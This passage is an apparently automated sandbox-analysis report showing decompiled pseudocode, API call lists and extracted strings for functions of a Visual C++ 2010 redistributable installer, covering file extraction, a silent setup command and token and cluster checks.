												goto L4;
											}
											__eflags = _t255 - _t296;
											if(_t255 == _t296) {
												L88:
												_push(0x4c7);
												goto L93;
											} else {
												__eflags =  *_t255;
												if( *_t255 == 0) {
													goto L88;
												} else {
													_t309 = _t255;
													_t130 = _t309 + 1; // 0x1
													_t333 = _t130;
													do {
														_t323 =  *_t309;
														_t309 = _t309 + 1;
														__eflags = _t323;
													} while (_t323 != 0);
													__eflags = _t309 - _t333 + 1 - 0x104;
													if(_t309 - _t333 + 1 >= 0x104) {
														L70:
														_push(0x52);
														goto L93;
													} else {
														_t323 = _t326 - _t255;
														__eflags = _t323;
														do {
															_t312 =  *_t255;
															 *((char*)(_t323 + _t255)) = _t312;
															_t255 = _t255 + 1;
															__eflags = _t312;
														} while (_t312 != 0);
														_t253 = E010045EB(_t326, _t326, _t296, _t296);
														__eflags = _t253;
														if(_t253 != 0) {
															_v1352 = 1;
														}
														__eflags = _v1352 - _t296;
														if(_v1352 == _t296) {
															continue;
														} else {
															L86:
															_pop(_t333);
															goto L87;
														}
													}
												}
											}
											goto L136;
										}
										goto L4;
									}
								}
							}
						}
					} else {
						L4:
						_push(0xffffffff);
						L93:
						E01003892();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t343);
						_t344 = _t345;
						_t191 =  *0x100c028; // 0xb636
						_push(_t296);
						_v1476 = _t191;
						_t192 = _v1464;
						_push(_t333);
						_t334 = _v1460;
						_push(_t326);
						if(_t192 == 0) {
							L134:
							_t193 = 0;
							__eflags = 0;
						} else {
							if(_t192 == 2) {
								__eflags =  *0x100c4ac; // 0x0
								if(__eflags != 0) {
									L113:
									__eflags =  *0x100c048; // 0x1
									if(__eflags != 0) {
										L119:
										__eflags =  *0x100c4b4; // 0x1
										if(__eflags != 0) {
											L122:
											E01002BC4("c:\4863269369430a9b27", _t334[1],  &_v272);
											_v276 = 1;
											 *0x100c3a0 = 0;
											E0100447F(0x100c004,  &_v272);
											while(1) {
												_t200 = CreateFileA( &_v272, 0x40000000, 3, 0, 2, 0x80, 0); // executed
												_t328 = _t200;
												__eflags = _t328 - 0xffffffff;
												if(_t328 != 0xffffffff) {
													break;
												}
												_t201 = GetLastError();
												__eflags = _t201 - 5;
												if(_t201 != 5) {
													L128:
													__eflags = _v276;
													if(_v276 == 0) {
														goto L132;
													} else {
														_v276 = 0;
														E01004590( &_v272, 0, 0); // executed
														continue;
													}
												} else {
													_t205 = E010044AD( &_v272, 0x100c3a0);
													__eflags = _t205;
													if(_t205 == 0) {
														goto L128;
													} else {
														_t206 = 0;
														__eflags = 0;
														do {
															_t166 = _t206 + 0x100c3a0; // 0x0
															_t302 =  *_t166;
															 *((char*)(_t344 + _t206 - 0x108)) = _t302;
															_t206 = _t206 + 1;
															__eflags = _t302;
														} while (_t302 != 0);
														continue;
													}
												}
												goto L135;
											}
											SetFilePointer(_t328,  *_t334, 0, 0); // executed
											SetEndOfFile(_t328); // executed
											SetFilePointer(_t328, 0, 0, 0); // executed
											 *0x100c4a4 = _t328;
											_t193 = _t328;
										} else {
											_t210 =  *0x100ce04; // 0x303f8
											__eflags = _t210;
											if(_t210 == 0) {
												goto L100;
											} else {
												SendDlgItemMessageA(_t210, 0x68, 0xc, 0, _t334[1]);
												goto L122;
											}
										}
									} else {
										__eflags =  *0x100c000; // 0x1
										if(__eflags == 0) {
											goto L119;
										} else {
											__imp___stricmp(_t334[1], "_sfx_manifest_");
											__eflags = _t192;
											if(_t192 != 0) {
												goto L119;
											} else {
												 *0x100c050 =  *_t334;
												_t212 = E01003BE7( *_t334 + 1);
												__eflags = _t212;
												 *0x100c04c = _t212;
												if(_t212 != 0) {
													 *0x100d048 = _t212;
													 *0x100c048 = 1;
													_t212->i = 0;
													_t193 = 0xdadafeed;
												} else {
													_push(8);
													goto L133;
												}
											}
										}
									}
								} else {
									__eflags =  *0x100ce08; // 0x0
									if(__eflags != 0) {
										goto L113;
									} else {
										_t192 = strstr(_t334[1], "cdtag.1");
										__eflags = _t192;
										if(_t192 != 0) {
											goto L134;
										} else {
											goto L113;
										}
									}
								}
							} else {
								if(_t192 != 3) {
									goto L134;
								} else {
									if(_t334[5] != 0xdadafeed) {
										DosDateTimeToFileTime(0, 0,  &_v292);
										LocalFileTimeToFileTime( &_v292,  &_v284);
										SetFileTime(_t334[5],  &_v284,  &_v284,  &_v284); // executed
										FindCloseChangeNotification(_t334[5]);
										__eflags =  *0x100c4b4; // 0x1
										 *0x100c4a4 = 0;
										if(__eflags != 0) {
											L102:
											__eflags =  *0x100c3a0; // 0x0
											if(__eflags == 0) {
												L104:
												__eflags =  *_t334;
												if( *_t334 != 0) {
													 *0x100ce0c = E01003E3A(_t334[1]);
													_t339 = E01002BC4(0x100d080, _t334[1],  &_v272);
													while(1) {
														__eflags = _t339 -  &_v272;
														if(_t339 <=  &_v272) {
															break;
														}
														__eflags = _t339->i - 0x5c;
														if(_t339->i != 0x5c) {
															_t339 = _t339 - 1;
															__eflags = _t339;
															continue;
														}
														break;
													}
													 *0x100d07c = E01003E3A( &_v272);
													 *_t339 = 0;
													 *0x101d3e4 = E01003E3A( &_v272);
												}
												goto L97;
											} else {
												E01002BC4(0x100d080, _t334[1],  &_v272);
												_t237 = MoveFileExA(0x100c3a0,  &_v272, 1);
												__eflags = _t237;
												if(_t237 == 0) {
													L132:
													_push(0xffffffff);
													goto L133;
												} else {
													goto L104;
												}
											}
										} else {
											_t238 =  *0x100ce04; // 0x303f8
											__eflags = _t238;
											if(_t238 != 0) {
												SendDlgItemMessageA(_t238, 0x6a, 0x405, 0, 0);
												goto L102;
											} else {
												L100:
												_push(0x4c7);
												L133:
												E01003892();
												goto L134;
											}
										}
									} else {
										L97:
										_t193 = 1;
									}
								}
							}
						}
						L135:
						_pop(_t335);
						return E010062FF(_t193, 0, _v28.Dacl, _t323, _t335);
					}
				} else {
					_t253 = E010045EB(__edi, "c:\4863269369430a9b27", 0, 0);
					if(_t253 != 0) {
						L87:
						return E010062FF(_t253, _t296, _v8, _t323, _t333);
					} else {
						 *0x100d080 = _t253;
						goto L3;
					}
				}
				L136:
			}

0x01004f6b
0x01004f6b
0x01004f76
0x01004f7e
0x01004f84
0x01004f8a
0x01004f94
0x01004f9b
0x01004fa2
0x01004fa8
0x01004fae
0x01004fb4
0x01004fba
0x01004fc0
0x01004fc6
0x01004fd0
0x01004fd6
0x01004fdc
0x01004fe2
0x01004ffd
0x01005012
0x01005019
0x01005022
0x01005023
0x0100502a
0x01005030
0x01005032
0x01005046
0x0100504c
0x0100504e
0x01005056
0x0100505c
0x0100506b
0x0100506d
0x0100506f
0x01005081
0x01005083
0x01005085
0x01005097
0x01005099
0x0100509b
0x010050ab
0x010050b1
0x010050b3
0x010050bb
0x010050bb
0x010050b3
0x0100509b
0x01005085
0x0100506f
0x0100504e
0x010050c1
0x010050c7
0x010050e6
0x010050f0
0x010050f6
0x010050fc
0x01005103
0x0100510a
0x0100510a
0x0100510d
0x01005112
0x01005114
0x0100511a
0x01005120
0x01005120
0x01005126
0x01005138
0x0100513f
0x01005146
0x0100514c
0x0100514e
0x01005155
0x0100527e
0x0100527e
0x0100527e
0x0100515b
0x01005162
0x01005174
0x0100517c
0x0100517e
0x01005182
0x0100519c
0x0100519c
0x010051a2
0x010051a7
0x010051a9
0x010051ab
0x00000000
0x010051b1
0x010051b8
0x010051bd
0x010051bf
0x00000000
0x010051c5
0x010051e8
0x010051ee
0x010051f0
0x00000000
0x010051f6
0x010051fc
0x01005203
0x01005203
0x01005209
0x0100520f
0x01005211
0x0100521b
0x0100521d
0x0100522d
0x01005230
0x01005258
0x01005258
0x0100525e
0x01005260
0x0100526a
0x0100526a
0x01005270
0x01005276
0x01005262
0x01005262
0x01005268
0x00000000
0x00000000
0x01005268
0x01005260
0x01005232
0x01005232
0x01005238
0x00000000
0x0100523a
0x0100523a
0x01005244
0x01005244
0x0100524a
0x01005250
0x0100523c
0x0100523c
0x01005242
0x00000000
0x00000000
0x00000000
0x00000000
0x01005242
0x0100523a
0x01005238
0x0100521f
0x0100521f
0x01005225
0x01005225
0x0100521d
0x010051f0
0x010051bf
0x01005184
0x01005190
0x01005192
0x01005196
0x00000000
0x00000000
0x00000000
0x00000000
0x01005196
0x01005182
0x01005155
0x01005284
0x01005286
0x01005289
0x01005289
0x01005295
0x01005297
0x0100529d
0x010052a9
0x010052ae
0x010052b3
0x010052c9
0x010052c9
0x010052cf
0x010052d5
0x00000000
0x010052d7
0x010052d7
0x010052e7
0x010052e7
0x010052ed
0x010052d9
0x010052df
0x010052e5
0x00000000
0x00000000
0x00000000
0x00000000
0x010052e5
0x010052d7
0x010052b5
0x010052b7
0x010052bd
0x010052f5
0x010052f5
0x010052f5
0x010052fb
0x010052bf
0x010052bf
0x00000000
0x010052c1
0x010052c1
0x010052c7
0x00000000
0x00000000
0x00000000
0x00000000
0x010052c7
0x010052bf
0x010052bd
0x01005301
0x01005308
0x01005309
0x01005309
0x0100530b
0x01005311
0x01005321
0x01005321
0x01005327
0x01005593
0x01005593
0x00000000
0x0100532d
0x0100532d
0x0100533b
0x0100533b
0x01005341
0x00000000
0x0100532f
0x0100532f
0x01005335
0x00000000
0x00000000
0x00000000
0x00000000
0x01005335
0x0100532d
0x01005313
0x01005313
0x01005319
0x01005319
0x01005347
0x01005357
0x0100535d
0x0100535f
0x0100545a
0x0100545a
0x01005465
0x0100546c
0x0100547a
0x0100548e
0x010054a8
0x010054af
0x010054b8
0x010054bd
0x010054bf
0x010054c8
0x00000000
0x00000000
0x00000000
0x00000000
0x01005365
0x01005365
0x0100536b
0x01005371
0x01005377
0x0100537c
0x01005388
0x0100538e
0x01005390
0x01005392
0x0100539f
0x010053a6
0x010053ab
0x010053af
0x010053b2
0x010053b8
0x010053ba
0x010053c0
0x010053c6
0x010053d7
0x010053d9
0x010053e0
0x010053e3
0x010053e4
0x010053e4
0x010053c6
0x010053b8
0x010053ec
0x010053f3
0x01005411
0x010053f5
0x010053f7
0x01005400
0x01005405
0x01005407
0x01005409
0x01005409
0x01005407
0x0100541b
0x01005421
0x01005428
0x0100542a
0x01005431
0x00000000
0x00000000
0x01005431
0x00000000
0x01005433
0x01005433
0x01005433
0x0100544b
0x01005451
0x01005458
0x00000000
0x00000000
0x00000000
0x00000000
0x01005458
0x01005315
0x01005315
0x01005317
0x00000000
0x00000000
0x00000000
0x00000000
0x01005317
0x01005313
0x0100529f
0x0100529f
0x00000000
0x0100529f
0x010050c9
0x010050c9
0x010050cf
0x00000000
0x010050d1
0x010050db
0x010054ce
0x010054ce
0x010054d0
0x010054d6
0x01005570
0x01005570
0x01005576
0x00000000
0x01005578
0x01005585
0x0100558a
0x0100558c
0x00000000
0x0100558e
0x00000000
0x0100558e
0x0100558c
0x010054dc
0x010054dc
0x010054e2
0x00000000
0x010054e8
0x010054e8
0x010054ed
0x01005501
0x01005507
0x0100550a
0x00000000
0x00000000
0x01005510
0x01005512
0x01005569
0x01005569
0x00000000
0x01005514
0x01005514
0x01005517
0x00000000
0x01005519
0x01005519
0x0100551b
0x0100551b
0x0100551e
0x0100551e
0x01005520
0x01005521
0x01005521
0x01005528
0x0100552e
0x010054c1
0x010054c1
0x00000000
0x01005530
0x01005532
0x01005532
0x01005534
0x01005534
0x01005536
0x01005539
0x0100553a
0x0100553a
0x01005541
0x01005546
0x01005548
0x0100554a
0x0100554a
0x01005554
0x0100555a
0x00000000
0x0100555c
0x0100555c
0x0100555d
0x00000000
0x0100555d
0x0100555a
0x0100552e
0x01005517
0x00000000
0x01005512
0x00000000
0x010054ed
0x010054e2
0x010054d6
0x010050cf
0x0100501b
0x0100501b
0x0100501b
0x01005598
0x01005598
0x0100559d
0x0100559e
0x0100559f
0x010055a0
0x010055a1
0x010055a2
0x010055a5
0x010055a6
0x010055ae
0x010055b3
0x010055b4
0x010055b7
0x010055ba
0x010055bb
0x010055c2
0x010055c3
0x01005885
0x01005885
0x01005885
0x010055c9
0x010055cc
0x01005702
0x01005708
0x0100572a
0x0100572a
0x01005730
0x01005789
0x01005789
0x0100578f
0x010057ad
0x010057bc
0x010057cd
0x010057d7
0x010057dd
0x01005836
0x0100584d
0x01005853
0x01005855
0x01005858
0x00000000
0x00000000
0x010057e4
0x010057ea
0x010057ed
0x0100581a
0x0100581a
0x01005820
0x00000000
0x01005822
0x0100582b
0x01005831
0x00000000
0x01005831
0x010057ef
0x010057fb
0x01005800
0x01005802
0x00000000
0x01005804
0x01005804
0x01005804
0x01005806
0x01005806
0x01005806
0x0100580c
0x01005813
0x01005814
0x01005814
0x00000000
0x01005818
0x01005802
0x00000000
0x010057ed
0x01005865
0x01005868
0x01005872
0x01005874
0x0100587a
0x01005791
0x01005791
0x01005796
0x01005798
0x00000000
0x0100579e
0x010057a7
0x00000000
0x010057a7
0x01005798
0x01005732
0x01005732
0x01005738
0x00000000
0x0100573a
0x01005742
0x01005748
0x0100574c
0x00000000
0x0100574e
0x01005750
0x01005758
0x0100575d
0x01005760
0x01005765
0x0100576e
0x01005773
0x0100577d
0x0100577f
0x01005767
0x01005767
0x00000000
0x01005767
0x01005765
0x0100574c
0x01005738
0x0100570a
0x0100570a
0x01005710
0x00000000
0x01005712
0x0100571a
0x01005720
0x01005724
0x00000000
0x00000000
0x00000000
0x00000000
0x01005724
0x01005710
0x010055d2
0x010055d5
0x00000000
0x010055db
0x010055e2
0x01005601
0x01005615
0x01005627
0x01005630
0x01005636
0x0100563c
0x01005642
0x01005667
0x01005667
0x01005672
0x010056a0
0x010056a0
0x010056a2
0x010056b0
0x010056c5
0x010056cf
0x010056d5
0x010056d7
0x00000000
0x00000000
0x010056c9
0x010056cc
0x010056ce
0x010056ce
0x00000000
0x010056ce
0x00000000
0x010056cc
0x010056e5
0x010056f1
0x010056f8
0x010056f8
0x00000000
0x01005674
0x0100567f
0x01005692
0x01005698
0x0100569a
0x0100587e
0x0100587e
0x00000000
0x00000000
0x00000000
0x00000000
0x0100569a
0x01005644
0x01005644
0x01005649
0x0100564b
0x01005661
0x00000000
0x0100564d
0x0100564d
0x0100564d
0x01005880
0x01005880
0x00000000
0x01005880
0x0100564b
0x010055e4
0x010055e4
0x010055e6
0x010055e6
0x010055e2
0x010055d5
0x010055cc
0x01005887
0x0100588b
0x01005893
0x01005893
0x01004fe4
0x01004feb
0x01004ff2
0x0100555e
0x01005568
0x01004ff8
0x01004ff8
0x00000000
0x01004ff8
0x01004ff2
0x00000000

APIs

Part of subcall function 010045EB: GetFileAttributesA.KERNELBASE(?), ref: 0100465E
Part of subcall function 010045EB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 01004672
Part of subcall function 010045EB: GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 01004682
Part of subcall function 010045EB: DecryptFileA.ADVAPI32(?,00000000), ref: 01004695
Part of subcall function 010045EB: GetLastError.KERNEL32 ref: 0100469B

InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?), ref: 0100502A
InitializeAcl.ADVAPI32(?,00000100,00000002,?,?,?,?,?), ref: 01005046
AddAccessAllowedAce.ADVAPI32(?,00000002,10000000,?,?,?,?,?,?), ref: 0100506B
AddAccessAllowedAce.ADVAPI32(?,00000002,10000000,?,?,?,?,?,?), ref: 01005081
AddAccessAllowedAce.ADVAPI32(?,00000002,10000000,?,?,?,?,?,?), ref: 01005097
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,?,?,?,?), ref: 010050AB
GetCurrentDirectoryA.KERNEL32(00000104,c:\4863269369430a9b27,?,?,?,?,?), ref: 010050DB
GetSystemDirectoryA.KERNEL32 ref: 010050F0
QueryDosDeviceA.KERNEL32(c:\,?,00000400), ref: 01005146
_strlwr.MSVCRT ref: 01005162
strstr.MSVCRT ref: 0100517C
strstr.MSVCRT ref: 01005190
GetDiskFreeSpaceA.KERNELBASE(005C3A63,?,?,?,?,?,?,?), ref: 010051E8
CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,?,?,?), ref: 01005357
CryptGenRandom.ADVAPI32(?,00000010,?,?,?,?,?,?), ref: 01005388
sprintf.MSVCRT ref: 0100539F
sprintf.MSVCRT ref: 010053D7
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?), ref: 0100544B
GetSystemTime.KERNEL32(?,?,?,?,?,?), ref: 0100547A
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?), ref: 0100548E
DialogBoxParamA.USER32 ref: 01005501
DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 01005601
LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,cc:\), ref: 01005615
SetFileTime.KERNELBASE(DADAFEED,?,?,?,?,00000000,cc:\), ref: 01005627
FindCloseChangeNotification.KERNELBASE(DADAFEED,?,00000000,cc:\), ref: 01005630
SendDlgItemMessageA.USER32(000303F8,0000006A,00000405,00000000,00000000), ref: 01005661
MoveFileExA.KERNEL32 ref: 01005692
strstr.MSVCRT ref: 0100571A
_stricmp.MSVCRT(?,_sfx_manifest_,?,00000000,cc:\), ref: 01005742
SendDlgItemMessageA.USER32(000303F8,00000068,0000000C,00000000,?), ref: 010057A7
GetLastError.KERNEL32(?,00000000,cc:\), ref: 010057E4

Part of subcall function 01004590: CreateDirectoryA.KERNELBASE(?,?), ref: 010045B8

CreateFileA.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,00000000,cc:\), ref: 0100584D
SetFilePointer.KERNELBASE(00000000,?,00000000,00000000,?,00000000,cc:\), ref: 01005865
SetEndOfFile.KERNELBASE(00000000,?,00000000,cc:\), ref: 01005868
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,cc:\), ref: 01005872

Strings

ramdisk, xrefs: 0100518A
4jG, xrefs: 0100576E
_sfx_manifest_, xrefs: 0100573A
c:\4863269369430a9b27\Setup.exe /q /norestart, xrefs: 010050EB, 010050F6
ccc:\, xrefs: 0100533B
c:\4863269369430a9b27, xrefs: 01004F7E, 01004FE6, 01004FF8, 010050D1, 01005377, 0100539E, 010053EC, 010053FF, 0100545A, 0100545F, 010054B7, 010054E8, 01005540, 01005580, 0100566D, 0100567E, 010056BF, 010057B7
%02x, xrefs: 010053CC
temp\ext, xrefs: 01005460
iG, xrefs: 01005760
harddisk, xrefs: 01005174
cdtag.1, xrefs: 01005712
p2H, xrefs: 010056E5

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: File$Time$AccessAllowedCryptDirectorySystemstrstr$ContextCreateDescriptorErrorInitializeItemLastMessagePointerSecuritySendsprintf$AcquireAddressAttributesChangeCloseCurrentDaclDateDecryptDeviceDialogDiskFindFreeLibraryLoadLocalMoveNotificationParamProcQueryRandomReleaseSpace_stricmp_strlwr
String ID: %02x$4jG$_sfx_manifest_$c:\4863269369430a9b27$c:\4863269369430a9b27\Setup.exe /q /norestart$ccc:\$cdtag.1$harddisk$p2H$ramdisk$temp\ext$iG
API String ID: 3434955678-55710526
Opcode ID: fc543d989388e90af9c16f5f6d5131e38cd47ae6136f058cfd03532917dbfc3f
Instruction ID: cb34d6e19b9d76d7dc8cc1b05be71e2c05cbe8c8c636e12e1b2dadafe6b93270
Opcode Fuzzy Hash: fc543d989388e90af9c16f5f6d5131e38cd47ae6136f058cfd03532917dbfc3f
Instruction Fuzzy Hash: 6232A1719006589FFB73DB689C48BEA7BB9AB05346F0041E6E6C9E21C1DB758AC4CF50

Uniqueness

Uniqueness Score: -1.00%

Function 010029C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E010029C2(void* __edi) {
				intOrPtr _v8;
				char _v528;
				char _v1040;
				char _v3088;
				char _v3089;
				_Unknown_base(*)()* _v3096;
				char _v3100;
				char _v3104;
				_Unknown_base(*)()* _v3108;
				_Unknown_base(*)()* _v3112;
				char _v3116;
				char _v3120;
				void* __ebx;
				void* __esi;
				intOrPtr _t26;
				intOrPtr _t31;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t38;
				void* _t40;
				void* _t50;
				intOrPtr* _t51;
				void* _t53;
				void* _t56;
				struct HINSTANCE__* _t57;
				void* _t59;
				void* _t62;

				_t26 =  *0x100c028; // 0xb636
				_v8 = _t26;
				_v3089 = 0;
				_v3104 = 0x100;
				_v3116 = 0x400;
				if(GetSystemDirectoryA( &_v528, 0x208) == 0) {
					L17:
					return E010062FF(_v3089, _t50, _v8, _t53, _t59);
				} else {
					_t56 =  &_v528 - 1;
					do {
						_t31 =  *((intOrPtr*)(_t56 + 1));
						_t56 = _t56 + 1;
					} while (_t31 != 0);
					_push(_t59);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsb"); // executed
					_t33 = LoadLibraryA( &_v528); // executed
					_t57 = _t33;
					if(_t57 == 0) {
						L16:
						_pop(_t59);
						goto L17;
					}
					_t34 = GetProcAddress(_t57, "OpenCluster");
					_v3108 = _t34;
					if(_t34 == 0) {
						L15:
						FreeLibrary(_t57); // executed
						goto L16;
					}
					_t36 = GetProcAddress(_t57, "CloseCluster");
					_v3112 = _t36;
					if(_t36 == 0) {
						goto L15;
					}
					_push(_t50);
					_t51 = GetProcAddress(_t57, "GetNodeClusterState");
					if(_t51 != 0) {
						_t38 = GetProcAddress(_t57, "GetClusterQuorumResource");
						_v3096 = _t38;
						if(_t38 != 0) {
							_t40 =  *_t51(0,  &_v3100); // executed
							if(_t40 == 0 && _v3100 == 0x13) {
								_t62 = _v3108(_t40);
								if(_t62 != 0) {
									_push( &_v3120);
									_push( &_v3116);
									_push( &_v3088);
									_push( &_v3104);
									_push( &_v1040);
									_push(_t62);
									if(_v3096() == 0) {
										_v3089 = _v3088;
									}
									_v3112(_t62);
								}
							}
						}
					}
					_pop(_t50);
					goto L15;
				}
			}

0x010029cd
0x010029d2
0x010029e1
0x010029e8
0x010029f2
0x01002a04
0x01002afe
0x01002b0d
0x01002a0a
0x01002a11
0x01002a12
0x01002a12
0x01002a15
0x01002a16
0x01002a1a
0x01002a20
0x01002a21
0x01002a22
0x01002a2a
0x01002a2b
0x01002a31
0x01002a35
0x01002afc
0x01002afc
0x00000000
0x01002afd
0x01002a47
0x01002a4b
0x01002a51
0x01002af5
0x01002af6
0x00000000
0x01002af6
0x01002a5d
0x01002a61
0x01002a67
0x00000000
0x00000000
0x01002a6d
0x01002a76
0x01002a7a
0x01002a82
0x01002a86
0x01002a8c
0x01002a97
0x01002a9b
0x01002aad
0x01002ab1
0x01002ab9
0x01002ac0
0x01002ac7
0x01002ace
0x01002ad5
0x01002ad6
0x01002adf
0x01002ae7
0x01002ae7
0x01002aee
0x01002aee
0x01002ab1
0x01002a9b
0x01002a8c
0x01002af4
0x00000000
0x01002af4

APIs

GetSystemDirectoryA.KERNEL32 ref: 010029FC
LoadLibraryA.KERNELBASE(?), ref: 01002A2B
GetProcAddress.KERNEL32(00000000,OpenCluster), ref: 01002A47
GetProcAddress.KERNEL32(00000000,CloseCluster), ref: 01002A5D
GetProcAddress.KERNEL32(00000000,GetNodeClusterState), ref: 01002A74
GetProcAddress.KERNEL32(00000000,GetClusterQuorumResource), ref: 01002A82
FreeLibrary.KERNELBASE(00000000), ref: 01002AF6

Strings

\clusapi.dll, xrefs: 01002A1B
GetNodeClusterState, xrefs: 01002A6E
CloseCluster, xrefs: 01002A57
OpenCluster, xrefs: 01002A41
GetClusterQuorumResource, xrefs: 01002A7C

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: AddressProc$Library$DirectoryFreeLoadSystem
String ID: CloseCluster$GetClusterQuorumResource$GetNodeClusterState$OpenCluster$\clusapi.dll
API String ID: 1303522615-3927317670
Opcode ID: 19ecdf8b4e077f10c3230d29f80904c3b00e6bcb7b69bd1645e8ca2f298c8bba
Instruction ID: 58cc90120aaaae1193b9abb678c188ec05ae692f01dcb1cc6c6543d780e01115
Opcode Fuzzy Hash: 19ecdf8b4e077f10c3230d29f80904c3b00e6bcb7b69bd1645e8ca2f298c8bba
Instruction Fuzzy Hash: F13147719002299BFB72DBA88D48FDA7BFC5F4A640F0442E5E544E2141DF748AC5DF61

Uniqueness

Uniqueness Score: -1.00%

Function 01003D02 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 112
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E01003D02(PSID* _a4, void* _a8, void** _a12) {
				intOrPtr _v8;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				void* _v20;
				long _v24;
				void** _v28;
				void* __ebx;
				void* __esi;
				intOrPtr _t22;
				void* _t34;
				void* _t44;
				signed int _t50;
				signed int _t56;
				void* _t63;
				unsigned int _t65;
				void* _t78;

				_t22 =  *0x100c028; // 0xb636
				_t77 = _a8;
				_v8 = _t22;
				_v28 = _a12;
				_v16.Value = 0;
				_v15 = 0;
				_v14 = 0;
				_v13 = 0;
				_v12 = 0;
				_v11 = 5;
				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _a4) == 0 || OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) == 0) {
					_t27 = 0;
				} else {
					_push(_t44);
					_t27 = GetTokenInformation(_v20, 4, "c:\4863269369430a9b27\Setup.exe   /q /norestart", 0x10000,  &_v24); // executed
					if(_t27 != 0) {
						_t65 = GetLengthSid( *0x100d3e0);
						_t34 = E01003BE7(_t65);
						 *_t77 = _t34;
						if(_t34 == 0) {
							L7:
							E01003892(8);
							goto L8;
						} else {
							_t77 =  *0x100d3e0; // 0x345c3a63
							_t56 = _t65 >> 2;
							memcpy(_t77 + _t56 + _t56, _t77, memcpy(_t34, _t77, _t56 << 2) & 0x00000003);
							_t78 = _t78 + 0x18;
							_t27 = GetTokenInformation(_v20, 1, "c:\4863269369430a9b27\Setup.exe   /q /norestart", 0x10000,  &_v24); // executed
							if(_t27 != 0) {
								_t77 = GetLengthSid( *0x100d3e0);
								_t34 = E01003BE7(_t43);
								 *_v28 = _t34;
								if(_t34 == 0) {
									goto L7;
								}
								L8:
								_t77 =  *0x100d3e0; // 0x345c3a63
								_t50 = _t77 >> 2;
								_t27 = memcpy(_t77 + _t50 + _t50, _t77, memcpy(_t34, _t77, _t50 << 2) & 0x00000003) + 1;
							}
						}
					}
					_pop(_t44);
				}
				return E010062FF(_t27, _t44, _v8, _t63, _t77);
			}

0x01003d0a
0x01003d13
0x01003d16
0x01003d32
0x01003d35
0x01003d39
0x01003d3d
0x01003d41
0x01003d45
0x01003d49
0x01003d55
0x01003d6e
0x01003d75
0x01003d75
0x01003d8f
0x01003d93
0x01003da6
0x01003da9
0x01003db1
0x01003db3
0x01003e04
0x01003e06
0x00000000
0x01003db5
0x01003db5
0x01003dc1
0x01003ddb
0x01003ddb
0x01003de0
0x01003de4
0x01003df2
0x01003df5
0x01003e00
0x01003e02
0x00000000
0x00000000
0x01003e0b
0x01003e0d
0x01003e17
0x01003e25
0x01003e25
0x01003de4
0x01003e26
0x01003e27
0x01003e27
0x01003e32

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01003D4D
GetCurrentProcess.KERNEL32(00000028,?), ref: 01003D5D
OpenProcessToken.ADVAPI32(00000000), ref: 01003D64
GetTokenInformation.KERNELBASE(?,00000004,c:\4863269369430a9b27\Setup.exe /q /norestart,00010000,?), ref: 01003D8F
GetLengthSid.ADVAPI32 ref: 01003DA0
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),c:\4863269369430a9b27\Setup.exe /q /norestart,00010000,?), ref: 01003DE0
GetLengthSid.ADVAPI32 ref: 01003DEC

Strings

c:\4863269369430a9b27\Setup.exe /q /norestart, xrefs: 01003D85, 01003DB5, 01003DD1, 01003E0D

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: Token$InformationLengthProcess$AllocateCurrentInitializeOpen
String ID: c:\4863269369430a9b27\Setup.exe /q /norestart
API String ID: 3439802213-1000022533
